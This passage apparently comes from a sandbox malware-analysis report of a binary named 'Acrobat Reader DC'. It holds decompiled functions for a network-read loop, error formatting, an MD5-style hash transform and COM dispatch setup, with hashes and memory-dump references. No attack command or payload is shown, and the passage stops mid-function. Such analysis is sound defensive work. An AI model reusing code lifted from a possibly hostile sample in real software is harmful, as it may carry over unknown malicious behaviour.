                                  • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                  • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E004422FE(long _a4, long _a8) {
				void* _t24;
				long _t32;
				void* _t33;
				void* _t39;
				long _t40;
				void* _t41;

				_t33 = _a8;
				_t40 = _a4;
				_a4 = 1;
				_a8 = 1;
				InternetQueryDataAvailable(_t33,  &_a8, 0, 0);
				if(_a8 == 0) {
					_a8 = 0x400;
				}
				if(_a4 == 0) {
					L9:
					_t37 =  *(_t40 + 8) |  *(_t40 + 0xc);
					if(( *(_t40 + 8) |  *(_t40 + 0xc)) != 0) {
						return E004422CB(_t40, 0, 0, 1);
					} else {
						return E004422CB(_t40, 0x21, 0xdeadbeef, _t37);
					}
				} else {
					while(1) {
						_t24 = E00431995(_a8);
						_t41 = _t41 + 4;
						_t39 = _t24;
						if(InternetReadFile(_t33, _t39, _a8,  &_a4) == 0) {
							break;
						}
						_t29 = _a4;
						if(_a4 == 0) {
							_push(_t39);
							E004111DC();
							goto L9;
						} else {
							E00431930(_t40 + 0x44, _t39, _t29);
							_t32 = _a4;
							 *(_t40 + 8) =  *(_t40 + 8) + _t32;
							asm("adc dword [esi+0xc], 0x0");
							if(_t32 != 0) {
								continue;
							} else {
								goto L9;
							}
						}
						goto L13;
					}
					_push(_t39);
					E004111DC();
					return E004422CB(_t40, 0x20, 0xdeadbeef, 0);
				}
				L13:
			}









                                  0x00442302
                                  0x00442306
                                  0x00442311
                                  0x00442314
                                  0x0044231e
                                  0x00442328
                                  0x0044232a
                                  0x0044232a
                                  0x00442335
                                  0x0044238b
                                  0x0044238e
                                  0x00442391
                                  0x004423b8
                                  0x00442393
                                  0x004423a5
                                  0x004423a5
                                  0x0044233e
                                  0x0044233e
                                  0x00442342
                                  0x00442347
                                  0x0044234a
                                  0x0044235e
                                  0x00000000
                                  0x00000000
                                  0x00442360
                                  0x00442365
                                  0x00442382
                                  0x00442383
                                  0x00000000
                                  0x00442367
                                  0x0044236d
                                  0x00442372
                                  0x00442375
                                  0x00442378
                                  0x0044237e
                                  0x00000000
                                  0x00442380
                                  0x00000000
                                  0x00442380
                                  0x0044237e
                                  0x00000000
                                  0x00442365
                                  0x004423bb
                                  0x004423bc
                                  0x004423d7
                                  0x004423d7
                                  0x00000000

                                  APIs
                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                  • String ID:
                                  • API String ID: 901099227-0
                                  • Opcode ID: 61fb9ab2a3299f8cead921e80471455f6f6b20a2502781ff411aee126c92a39c
                                  • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                  • Opcode Fuzzy Hash: 61fb9ab2a3299f8cead921e80471455f6f6b20a2502781ff411aee126c92a39c
                                  • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044AF6C Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,00000001,?,00451C81,?,00000001,?), ref: 0044AF9D
                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,00000001,?,00451C81,?,00000001,?), ref: 0044AFB6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ErrorFormatLastMessage
                                  • String ID:
                                  • API String ID: 3479602957-0
                                  • Opcode ID: 7201a099929c13ddf9d8c4ed88e1fa575203edf34e49f70b38f45227ddf022c1
                                  • Instruction ID: 34579116b05a7082732a3a1f7365c6d8fd3edd81a632b3ed1e6c87f0e426309d
                                  • Opcode Fuzzy Hash: 7201a099929c13ddf9d8c4ed88e1fa575203edf34e49f70b38f45227ddf022c1
                                  • Instruction Fuzzy Hash: 57F0B4712503186AFB24AB58DC49FBAB36CEF44711F0046AAF504971D1D6F07D40C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FA10 Relevance: 2.1, APIs: 1, Instructions: 607COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 49%
                                  			E0040FA10(intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				signed int _t248;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t256;
				signed int _t264;
				signed int _t281;
				signed int _t298;
				signed int _t308;
				signed int _t310;
				signed int _t312;
				signed int _t314;
				signed int _t316;
				signed int _t318;
				signed int _t320;
				signed int _t322;
				signed int _t335;
				signed int _t376;
				signed int _t385;
				signed int _t387;
				signed int _t389;
				signed int _t391;
				signed int _t393;
				signed int _t395;
				signed int _t397;
				signed int _t399;
				signed int _t401;
				signed int _t403;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				intOrPtr _t436;
				signed int _t454;
				signed int _t456;
				signed int _t458;
				signed int _t460;
				signed int _t462;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t470;
				signed int _t472;
				signed int _t474;
				signed int _t482;
				signed int _t484;
				signed int _t486;
				signed int _t488;
				signed int _t490;
				intOrPtr _t491;
				signed int _t544;
				signed int _t610;
				signed int _t621;
				signed int _t627;
				signed int _t693;
				signed int _t694;
				signed int _t696;
				signed int _t701;
				signed int _t703;
				signed int _t708;
				signed int _t710;
				signed int _t715;
				signed int _t719;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t730;
				signed int _t732;
				signed int _t734;
				signed int _t740;
				signed int _t746;
				signed int _t748;
				signed int _t750;
				signed int _t752;
				signed int _t754;

				_t491 = _a4;
				_t694 =  *(_t491 + 0x38);
				_t335 =  *(_t491 + 0x3c);
				_v8 =  *((intOrPtr*)(_t491 + 0x40));
				E004100C0(_a8,  &_v72);
				_t385 = _v8;
				asm("rol eax, 0x7");
				_t248 = ( !_t694 & _t385 | _t335 & _t694) +  *((intOrPtr*)(_t491 + 0x34)) + _v72 - 0x28955b88 + _t694;
				asm("rol ecx, 0xc");
				_t387 = ( !_t248 & _t335 | _t694 & _t248) + _v68 + _t385 - 0x173848aa + _t248;
				asm("ror edx, 0xf");
				_t454 = ( !_t387 & _t694 | _t387 & _t248) + _v64 + _t335 + 0x242070db + _t387;
				asm("ror esi, 0xa");
				_t696 = ( !_t454 & _t248 | _t387 & _t454) + _v60 + _t694 - 0x3e423112 + _t454;
				_a8 = _t696;
				_t701 = _a8;
				asm("rol eax, 0x7");
				_t250 = ( !_t696 & _t387 | _t454 & _a8) + _v56 + _t248 - 0xa83f051 + _t701;
				asm("rol ecx, 0xc");
				_t389 = ( !_t250 & _t454 | _t701 & _t250) + _v52 + _t387 + 0x4787c62a + _t250;
				asm("ror edx, 0xf");
				_t456 = ( !_t389 & _t701 | _t389 & _t250) + _v48 + _t454 - 0x57cfb9ed + _t389;
				asm("ror esi, 0xa");
				_t703 = ( !_t456 & _t250 | _t389 & _t456) + _v44 + _t701 - 0x2b96aff + _t456;
				_a8 = _t703;
				_t708 = _a8;
				asm("rol eax, 0x7");
				_t252 = ( !_t703 & _t389 | _t456 & _a8) + _v40 + _t250 + 0x698098d8 + _t708;
				asm("rol ecx, 0xc");
				_t391 = ( !_t252 & _t456 | _t708 & _t252) + _v36 + _t389 - 0x74bb0851 + _t252;
				asm("ror edx, 0xf");
				_t458 = ( !_t391 & _t708 | _t391 & _t252) + _v32 + _t456 - 0xa44f + _t391;
				asm("ror esi, 0xa");
				_t710 = ( !_t458 & _t252 | _t391 & _t458) + _v28 + _t708 - 0x76a32842 + _t458;
				_a8 = _t710;
				_t715 = _a8;
				asm("rol eax, 0x7");
				_t254 = ( !_t710 & _t391 | _t458 & _a8) + _v24 + _t252 + 0x6b901122 + _t715;
				asm("rol ecx, 0xc");
				_t393 = ( !_t254 & _t458 | _t715 & _t254) + _v20 + _t391 - 0x2678e6d + _t254;
				_t544 =  !_t393;
				_t63 = _t458 - 0x5986bc72; // -1497744253
				asm("ror edx, 0xf");
				_t460 = (_t544 & _t715 | _t393 & _t254) + _v16 + _t63 + _t393;
				_t719 =  !_t460;
				_v8 = _t719;
				asm("ror esi, 0xa");
				_t724 = (_t719 & _t254 | _t393 & _t460) + _v12 + _a8 + 0x49b40821 + _t460;
				asm("rol eax, 0x5");
				_t256 = (_t544 & _t460 | _t393 & _t724) + _v68 + _t254 - 0x9e1da9e + _t724;
				asm("rol ecx, 0x9");
				_t395 = (_v8 & _t724 | _t460 & _t256) + _v48 + _t393 - 0x3fbf4cc0 + _t256;
				asm("rol edx, 0xe");
				_t462 = ( !_t724 & _t256 | _t395 & _t724) + _v28 + _t460 + 0x265e5a51 + _t395;
				asm("ror esi, 0xc");
				_t726 = ( !_t256 & _t395 | _t462 & _t256) + _v72 + _t724 - 0x16493856 + _t462;
				asm("rol eax, 0x5");
				_a8 = ( !_t395 & _t462 | _t395 & _t726) + _v52 + _t256 - 0x29d0efa3 + _t726;
				_t264 = _a8;
				asm("rol ecx, 0x9");
				_t397 = ( !_t462 & _t726 | _t462 & _a8) + _v32 + _t395 + 0x2441453 + _t264;
				asm("rol edx, 0xe");
				_t464 = ( !_t726 & _t264 | _t397 & _t726) + _v12 + _t462 - 0x275e197f + _t397;
				asm("ror esi, 0xc");
				_t728 = ( !_t264 & _t397 | _t464 & _a8) + _v56 + _t726 - 0x182c0438 + _t464;
				asm("rol eax, 0x5");
				_a8 = ( !_t397 & _t464 | _t397 & _t728) + _v36 + _a8 + 0x21e1cde6 + _t728;
				_t106 = _t397 - 0x3cc8f82a; // -1015545653
				_t281 = _a8;
				asm("rol ecx, 0x9");
				_t399 = ( !_t464 & _t728 | _t464 & _a8) + _v16 + _t106 + _t281;
				asm("rol edx, 0xe");
				_t466 = ( !_t728 & _t281 | _t399 & _t728) + _v60 + _t464 - 0xb2af279 + _t399;
				asm("ror esi, 0xc");
				_t730 = ( !_t281 & _t399 | _t466 & _a8) + _v40 + _t728 + 0x455a14ed + _t466;
				asm("rol eax, 0x5");
				_a8 = ( !_t399 & _t466 | _t399 & _t730) + _v20 + _a8 - 0x561c16fb + _t730;
				_t298 = _a8;
				asm("rol ecx, 0x9");
				_t401 = ( !_t466 & _t730 | _t466 & _a8) + _v64 + _t399 - 0x3105c08 + _t298;
				asm("rol edx, 0xe");
				_t468 = ( !_t730 & _t298 | _t401 & _t730) + _v44 + _t466 + 0x676f02d9 + _t401;
				asm("ror esi, 0xc");
				_t732 = ( !_t298 & _t401 | _t468 & _a8) + _v24 + _t730 - 0x72d5b376 + _t468;
				asm("rol eax, 0x4");
				_t308 = (_t401 ^ _t468 ^ _t732) + _v52 + _a8 - 0x5c6be + _t732;
				asm("rol ecx, 0xb");
				_t403 = (_t468 ^ _t732 ^ _t308) + _v40 + _t401 - 0x788e097f + _t308;
				asm("rol edx, 0x10");
				_t470 = (_t403 ^ _t732 ^ _t308) + _v28 + _t468 + 0x6d9d6122 + _t403;
				_t610 = _t403 ^ _t470;
				_a8 = _t610;
				_t145 = _t732 - 0x21ac7f4; // -31051519
				asm("ror esi, 0x9");
				_t734 = (_t610 ^ _t308) + _v16 + _t145 + _t470;
				asm("rol eax, 0x4");
				_t310 = (_a8 ^ _t734) + _v68 + _t308 - 0x5b4115bc + _t734;
				asm("rol edi, 0xb");
				_t621 = (_t470 ^ _t734 ^ _t310) + _v56 + _t403 + 0x4bdecfa9 + _t310;
				asm("rol edx, 0x10");
				_t472 = (_t621 ^ _t734 ^ _t310) + _v44 + _t470 - 0x944b4a0 + _t621;
				_t376 = _t621 ^ _t472;
				asm("ror ecx, 0x9");
				_t412 = (_t376 ^ _t310) + _v32 + _t734 - 0x41404390 + _t472;
				asm("rol eax, 0x4");
				_t312 = (_t376 ^ _t412) + _v20 + _t310 + 0x289b7ec6 + _t412;
				asm("rol esi, 0xb");
				_t740 = (_t472 ^ _t412 ^ _t312) + _v72 + _t621 - 0x155ed806 + _t312;
				asm("rol edi, 0x10");
				_t627 = (_t740 ^ _t412 ^ _t312) + _v60 + _t472 - 0x2b10cf7b + _t740;
				_t474 = _t740 ^ _t627;
				asm("ror ecx, 0x9");
				_t414 = (_t474 ^ _t312) + _v48 + _t412 + 0x4881d05 + _t627;
				asm("rol eax, 0x4");
				_t314 = (_t474 ^ _t414) + _v36 + _t312 - 0x262b2fc7 + _t414;
				asm("rol edx, 0xb");
				_t482 = (_t627 ^ _t414 ^ _t314) + _v24 + _t740 - 0x1924661b + _t314;
				asm("rol esi, 0x10");
				_t746 = (_t482 ^ _t414 ^ _t314) + _v12 + _t627 + 0x1fa27cf8 + _t482;
				asm("ror ecx, 0x9");
				_t416 = (_t482 ^ _t746 ^ _t314) + _v64 + _t414 - 0x3b53a99b + _t746;
				asm("rol eax, 0x6");
				_t316 = (( !_t482 | _t416) ^ _t746) + _v72 + _t314 - 0xbd6ddbc + _t416;
				asm("rol edx, 0xa");
				_t484 = (( !_t746 | _t316) ^ _t416) + _v44 + _t482 + 0x432aff97 + _t316;
				_t191 = _t746 - 0x546bdc59; // -1412096868
				asm("rol esi, 0xf");
				_t748 = (( !_t416 | _t484) ^ _t316) + _v16 + _t191 + _t484;
				asm("ror ecx, 0xb");
				_t418 = (( !_t316 | _t748) ^ _t484) + _v52 + _t416 - 0x36c5fc7 + _t748;
				asm("rol eax, 0x6");
				_t318 = (( !_t484 | _t418) ^ _t748) + _v24 + _t316 + 0x655b59c3 + _t418;
				asm("rol edx, 0xa");
				_t486 = (( !_t748 | _t318) ^ _t418) + _v60 + _t484 - 0x70f3336e + _t318;
				asm("rol esi, 0xf");
				_t750 = (( !_t418 | _t486) ^ _t318) + _v32 + _t748 - 0x100b83 + _t486;
				asm("ror ecx, 0xb");
				_t420 = (( !_t318 | _t750) ^ _t486) + _v68 + _t418 - 0x7a7ba22f + _t750;
				asm("rol eax, 0x6");
				_t320 = (( !_t486 | _t420) ^ _t750) + _v40 + _t318 + 0x6fa87e4f + _t420;
				asm("rol edx, 0xa");
				_t488 = (( !_t750 | _t320) ^ _t420) + _v12 + _t486 - 0x1d31920 + _t320;
				asm("rol esi, 0xf");
				_t752 = (( !_t420 | _t488) ^ _t320) + _v48 + _t750 - 0x5cfebcec + _t488;
				asm("ror edi, 0xb");
				_t693 = (( !_t320 | _t752) ^ _t488) + _v20 + _t420 + 0x4e0811a1 + _t752;
				asm("rol eax, 0x6");
				_t322 = (( !_t488 | _t693) ^ _t752) + _v56 + _t320 - 0x8ac817e + _t693;
				asm("rol edx, 0xa");
				_t490 = (( !_t752 | _t322) ^ _t693) + _v28 + _t488 - 0x42c50dcb + _t322;
				_t436 = _a4;
				asm("rol esi, 0xf");
				_t754 = (( !_t693 | _t490) ^ _t322) + _v64 + _t752 + 0x2ad7d2bb + _t490;
				 *((intOrPtr*)(_t436 + 0x34)) =  *((intOrPtr*)(_t436 + 0x34)) + _t322;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t436 + 0x38)) = (( !_t322 | _t754) ^ _t490) + _v36 + _t693 - 0x14792c6f +  *((intOrPtr*)(_t436 + 0x38)) + _t754;
				 *((intOrPtr*)(_t436 + 0x3c)) =  *((intOrPtr*)(_t436 + 0x3c)) + _t754;
				 *((intOrPtr*)(_t436 + 0x40)) =  *((intOrPtr*)(_t436 + 0x40)) + _t490;
				return E00412F40( &_v72, 0, 0x40);
			}
































































































                                  0x0040fa19
                                  0x0040fa1f
                                  0x0040fa22
                                  0x0040fa25
                                  0x0040fa2e
                                  0x0040fa36
                                  0x0040fa51
                                  0x0040fa54
                                  0x0040fa6c
                                  0x0040fa6f
                                  0x0040fa87
                                  0x0040fa8a
                                  0x0040faa2
                                  0x0040faa5
                                  0x0040faa7
                                  0x0040fabf
                                  0x0040fac2
                                  0x0040fac5
                                  0x0040fadd
                                  0x0040fae0
                                  0x0040fafa
                                  0x0040fafd
                                  0x0040fb13
                                  0x0040fb16
                                  0x0040fb18
                                  0x0040fb30
                                  0x0040fb33
                                  0x0040fb36
                                  0x0040fb4e
                                  0x0040fb51
                                  0x0040fb6b
                                  0x0040fb6e
                                  0x0040fb84
                                  0x0040fb87
                                  0x0040fb89
                                  0x0040fba1
                                  0x0040fba4
                                  0x0040fba7
                                  0x0040fbbf
                                  0x0040fbc2
                                  0x0040fbc6
                                  0x0040fbd5
                                  0x0040fbdc
                                  0x0040fbdf
                                  0x0040fbe5
                                  0x0040fbe7
                                  0x0040fbff
                                  0x0040fc02
                                  0x0040fc1b
                                  0x0040fc1e
                                  0x0040fc2e
                                  0x0040fc31
                                  0x0040fc4f
                                  0x0040fc52
                                  0x0040fc66
                                  0x0040fc69
                                  0x0040fc7f
                                  0x0040fc84
                                  0x0040fca0
                                  0x0040fca3
                                  0x0040fca6
                                  0x0040fcc0
                                  0x0040fcc3
                                  0x0040fcd8
                                  0x0040fcdb
                                  0x0040fcf4
                                  0x0040fcf9
                                  0x0040fd0e
                                  0x0040fd15
                                  0x0040fd18
                                  0x0040fd1b
                                  0x0040fd35
                                  0x0040fd38
                                  0x0040fd4d
                                  0x0040fd50
                                  0x0040fd69
                                  0x0040fd6e
                                  0x0040fd8a
                                  0x0040fd8d
                                  0x0040fd90
                                  0x0040fdaa
                                  0x0040fdad
                                  0x0040fdc7
                                  0x0040fdca
                                  0x0040fdd8
                                  0x0040fddb
                                  0x0040fded
                                  0x0040fdf0
                                  0x0040fe02
                                  0x0040fe05
                                  0x0040fe09
                                  0x0040fe0b
                                  0x0040fe13
                                  0x0040fe1d
                                  0x0040fe20
                                  0x0040fe2e
                                  0x0040fe31
                                  0x0040fe43
                                  0x0040fe46
                                  0x0040fe5a
                                  0x0040fe5d
                                  0x0040fe5f
                                  0x0040fe6f
                                  0x0040fe72
                                  0x0040fe80
                                  0x0040fe83
                                  0x0040fe95
                                  0x0040fe98
                                  0x0040feaa
                                  0x0040fead
                                  0x0040feb1
                                  0x0040fec1
                                  0x0040fec4
                                  0x0040fed6
                                  0x0040fed9
                                  0x0040fee7
                                  0x0040feea
                                  0x0040fefc
                                  0x0040feff
                                  0x0040ff11
                                  0x0040ff14
                                  0x0040ff28
                                  0x0040ff2b
                                  0x0040ff3f
                                  0x0040ff42
                                  0x0040ff4f
                                  0x0040ff56
                                  0x0040ff59
                                  0x0040ff6d
                                  0x0040ff70
                                  0x0040ff84
                                  0x0040ff87
                                  0x0040ff9f
                                  0x0040ffa2
                                  0x0040ffb2
                                  0x0040ffb5
                                  0x0040ffc9
                                  0x0040ffcc
                                  0x0040ffe0
                                  0x0040ffe3
                                  0x0040fffb
                                  0x0040fffe
                                  0x0041000e
                                  0x00410011
                                  0x00410025
                                  0x00410028
                                  0x0041003c
                                  0x0041003f
                                  0x00410053
                                  0x00410058
                                  0x0041006c
                                  0x00410076
                                  0x00410079
                                  0x00410082
                                  0x0041008c
                                  0x00410096
                                  0x0041009e
                                  0x004100a6
                                  0x004100bb

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset
                                  • String ID:
                                  • API String ID: 2102423945-0
                                  • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                  • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                  • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                  • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00444FD2 Relevance: 1.7, APIs: 1, Instructions: 481stringCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00444FD2(void* __eflags, signed int _a4, signed int _a8) {
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				void* __edi;
				void* __esi;
				int _t348;
				signed int _t352;
				char** _t358;
				signed int _t359;
				signed int _t360;
				signed int _t364;
				signed int* _t365;
				signed int _t366;
				signed int _t367;
				signed int _t369;
				signed int _t371;
				signed int _t373;
				signed int _t379;
				intOrPtr _t383;
				signed int _t385;
				short _t386;
				short _t389;
				signed int _t394;
				signed int _t408;
				signed int _t409;
				int _t433;
				signed int _t435;
				signed int* _t437;
				signed int _t440;
				signed int _t448;
				signed int _t450;
				signed int _t453;
				signed int _t454;
				signed int _t473;
				signed int _t475;
				signed int _t478;
				signed int _t479;
				intOrPtr _t480;
				signed int _t481;
				signed int _t497;
				signed int _t501;
				signed int _t502;
				signed int _t514;
				signed int _t516;
				signed int* _t521;
				short _t544;
				WCHAR* _t548;
				signed int _t549;
				signed int _t553;
				void* _t554;
				void* _t555;
				void* _t556;
				void* _t558;
				intOrPtr _t591;

				_t558 = __eflags;
				_t553 = _a4;
				_t548 = _a8;
				_t348 = lstrlenW(_t548);
				_v28 = _t348;
				_push( ~(0 | _t558 > 0x00000000) | (_t348 + 0x00000001) * 0x00000002);
				 *((intOrPtr*)(_t553 + 4)) = E004115D7(_t548, _t553, _t558);
				_t352 = 0;
				_t555 = _t554 + 4;
				_a4 = 2;
				if(_v28 <= 0) {
					L36:
					if( *((intOrPtr*)(_t553 + 0x24)) != 0) {
						_t82 =  &_a4;
						 *_t82 = _a4 + 3;
						_t591 =  *_t82;
					}
					_push( ~(0 | _t591 > 0x00000000) | _a4 * 0x00000004);
					 *((intOrPtr*)(_t553 + 8)) = E004115D7(_t548, _t553, _t591);
					_push( ~(0 | _t591 > 0x00000000) | _a4 * 0x0000001c);
					_t358 = E004115D7(_t548, _t553, _t591);
					 *(_t553 + 0xc) = _t358;
					 *_t358 = L"InterfaceDispatch";
					_t359 =  *(_t553 + 0xc);
					_t549 = 0;
					 *((intOrPtr*)(_t359 + 4)) = 0;
					_t360 = _t359 | 0xffffffff;
					 *( *(_t553 + 0xc) + 8) = _t360;
					 *( *(_t553 + 0xc) + 0xc) = _t360;
					 *((intOrPtr*)( *(_t553 + 0xc) + 0x10)) = 4;
					 *((intOrPtr*)( *(_t553 + 0xc) + 0x14)) = 0;
					 *((short*)( *(_t553 + 0xc) + 0x18)) = 1;
					 *((short*)( *(_t553 + 0xc) + 0x1a)) = 0;
					 *((intOrPtr*)( *(_t553 + 0xc) + 0x1c)) = 0;
					 *((intOrPtr*)( *(_t553 + 0xc) + 0x20)) = 0;
					 *((intOrPtr*)( *(_t553 + 0xc) + 0x24)) = 0;
					 *( *(_t553 + 0xc) + 0x28) = _t360;
					 *((intOrPtr*)( *(_t553 + 0xc) + 0x2c)) = 4;
					 *((intOrPtr*)( *(_t553 + 0xc) + 0x30)) = 0;
					 *((short*)( *(_t553 + 0xc) + 0x34)) = 2;
					 *((short*)( *(_t553 + 0xc) + 0x36)) = 0x13;
					_a8 = 2;
					 *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)))) = 0;
					_t556 = _t555 + 8;
					 *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 4)) = 0;
					_t592 =  *((intOrPtr*)(_t553 + 0x24));
					if( *((intOrPtr*)(_t553 + 0x24)) != 0) {
						 *( *(_t553 + 0xc) + 0x38) = L"QueryInterface";
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x40)) = 1;
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x44)) = 0;
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x48)) = 4;
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x4c)) = 2;
						 *((short*)( *(_t553 + 0xc) + 0x50)) = 1;
						_push(0x10);
						_a8 = 5;
						 *((short*)( *(_t553 + 0xc) + 0x52)) = 3;
						 *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 8)) = E004115D7(0, _t553, _t592);
						 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 8)) + 4)) = 0x48;
						 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 8)) + 0xc)) = 0x4013;
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 8)))) = 0;
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 8)) + 8)) = 0;
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x3c)) =  *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 8));
						 *( *(_t553 + 0xc) + 0x54) = L"AddRef";
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x58)) = 0;
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x5c)) = 2;
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x60)) = 1;
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x64)) = 4;
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x68)) = 0;
						 *((short*)( *(_t553 + 0xc) + 0x6c)) = 1;
						 *((short*)( *(_t553 + 0xc) + 0x6e)) = 0x13;
						 *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 0xc)) = 0;
						 *( *(_t553 + 0xc) + 0x70) = L"Release";
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x74)) = 0;
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x78)) = 3;
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x7c)) = 2;
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x80)) = 4;
						 *((intOrPtr*)( *(_t553 + 0xc) + 0x84)) = 0;
						 *((short*)( *(_t553 + 0xc) + 0x88)) = 1;
						 *((short*)( *(_t553 + 0xc) + 0x8a)) = 0x13;
						_t556 = _t556 + 4;
						 *((intOrPtr*)( *((intOrPtr*)(_t553 + 8)) + 0x10)) = 0;
					}
					_t364 =  *((intOrPtr*)(_t553 + 4));
					_v8 = _t549;
